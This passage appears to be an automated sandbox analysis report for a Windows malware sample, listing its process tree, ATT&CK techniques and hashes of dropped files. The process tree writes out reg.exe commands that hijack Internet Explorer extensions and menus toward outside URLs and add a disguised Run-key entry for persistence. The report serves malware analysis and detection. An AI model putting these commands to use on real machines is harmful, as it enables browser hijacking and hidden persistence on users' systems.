    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b03A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuText" /d "░┘╢╚╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1376
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "░┘╢╚╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:836
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "MenuStatusBar" /d "╣╚╕Φ╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1732
- - C:\Windows\System\mstdc.exe
    C:\Windows\System\mstdc.exe
    3⤵
    - Executes dropped EXE
    PID:1900
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\mstdc.bat""
      4⤵
      PID:1892
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "Exec" /d "http://www.biso.cn/js/re.asp?i=2" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:276
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "C:\Windows\System32\gg.ico" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1656
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "ButtonText" /d "╣╚╕Φ╦╤╦≈" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:976
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b02A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "" /d "" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1492
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "hotIcon" /d "C:\Windows\System32\shell32.dll,14" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1816
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Extensions\{b01A04EE-3024-11D2-8F1F-0000F87ABD16}" /v "default Icon" /d "C:\Windows\System32\shell32.dll,14" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1728
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\═°╒╛╡╝║╜" /v "" /d "http://www.biso.cn/js/menu.asp?menu=123" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\│ú╙├╚φ╝■" /v "" /d "http://www.biso.cn/js/menu.asp?menu=soft" /f
    3⤵
    - Modifies Internet Explorer settings
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v 360safetray /d """"C:\Windows\Config\shell\winopim.exe"""" /f
    3⤵
    - Adds Run key to start application
    PID:1940

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\bd.ico

Filesize
22KB

MD5
ef8ac542aa53436343300c722b549b92

SHA1
7ae192461958fb705804cf53708ed766a95f4e6f

SHA256
f6aeee3554d8884e904ad39ff35c5c64e9a63ce99b582b010399ee3b825a44bf

SHA512
3ea42ff5e9f930f6cb39392135f64156ee2cdc6a1c41b2c3cf2da2e6f7c49f6ace0ab619b7820421dffbe7608c395f61516ae23ac9200f819f3bfe751494dc86

Download Submit
C:\Users\Admin\AppData\Local\Temp\gg.ico

Filesize
22KB

MD5
8ada014673ca24dd00da270c3c412a1a

SHA1
dbe0ab7178715b7ed7177f1b50b17e494f227ce0

SHA256
8c1dbad82e055db66b57108261fea963a9f661cdcf437173858c6a8a7ffc4919

SHA512
ced5fcfa4ab1b80af6e8fc847843235acd5189c9e34ad85cbb6eda9a66a98977e6b94e1930a8fc71f39fc2fe89105232fce8da43db1370598e70d4dbc36d748b

Download Submit
C:\Users\Admin\AppData\Local\Temp\mstdc.bat

Filesize
541B

MD5
348783259a9f3f30af9903874802d8d3

SHA1
42e971517efced514f42bec8e07aae31e324f82b

SHA256
9cba5d403c0769dd932b5fb593a94faec772e62f68c50b1c7abaae4b3e4d7405

SHA512
e92dce24ebaf9248614c30ffecb9ec10718800bf8429b6616f5d32f9b50f3285ac16594dd51b904476dd6ef9c7e445ca422ca299c8e5d1b844463d7885d941b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\mstdc.exe

Filesize
19KB

MD5
ca096d98f96ff1003cd259cf96f01227

SHA1
301dad354d173c2f74c4f08b875e7a9122513dc2

SHA256
d6f63102829ad9c9337da5cda800a8198f5874a11c7a0fd5095f938db2fbe66e

SHA512
f81aff49d8e54efd4f232922dd8db016bde8113751c578403e8dfc23e5eb84142ea8bd040cab52ad48ed39f0af4b80f1ff91353ed608188c2fd35a7a2dbb44bd

Download Submit
C:\Users\Admin\AppData\Local\Temp\win32.bat

Filesize
10KB

MD5
6eca432bfc685808c9fd1c0c6dcf04da

SHA1
fb2c3bfd9ad8216a39bd425f8a95fa52e7f563f3

SHA256
370a7854421df9c11a14ab028cf2e4d8eed77cb4f6ba169818c02f5184882173

SHA512
0c56eff4599ea752ec6607a3ee74a431b3396f67f8acfaf94785511140bf5fe4f01038a2b4f3a7c6c5826583da6241170ef24089b409c3cf969ba7642542902b

Download Submit
C:\Windows\system\mstdc.exe

Filesize
19KB

MD5
ca096d98f96ff1003cd259cf96f01227

SHA1
301dad354d173c2f74c4f08b875e7a9122513dc2

SHA256
d6f63102829ad9c9337da5cda800a8198f5874a11c7a0fd5095f938db2fbe66e

SHA512
f81aff49d8e54efd4f232922dd8db016bde8113751c578403e8dfc23e5eb84142ea8bd040cab52ad48ed39f0af4b80f1ff91353ed608188c2fd35a7a2dbb44bd

Download Submit
\Windows\system\mstdc.exe

Filesize
19KB

MD5
ca096d98f96ff1003cd259cf96f01227

SHA1
301dad354d173c2f74c4f08b875e7a9122513dc2

SHA256
d6f63102829ad9c9337da5cda800a8198f5874a11c7a0fd5095f938db2fbe66e

SHA512
f81aff49d8e54efd4f232922dd8db016bde8113751c578403e8dfc23e5eb84142ea8bd040cab52ad48ed39f0af4b80f1ff91353ed608188c2fd35a7a2dbb44bd

Download Submit
\Windows\system\mstdc.exe

Filesize
19KB

MD5
ca096d98f96ff1003cd259cf96f01227

SHA1
301dad354d173c2f74c4f08b875e7a9122513dc2

SHA256
d6f63102829ad9c9337da5cda800a8198f5874a11c7a0fd5095f938db2fbe66e

SHA512
f81aff49d8e54efd4f232922dd8db016bde8113751c578403e8dfc23e5eb84142ea8bd040cab52ad48ed39f0af4b80f1ff91353ed608188c2fd35a7a2dbb44bd

Download Submit
memory/1364-57-0x0000000000400000-0x000000000042A000-memory.dmp

Filesize
168KB

Download
memory/1784-62-0x00000000763F1000-0x00000000763F3000-memory.dmp

Filesize
8KB

Download
memory/1900-113-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads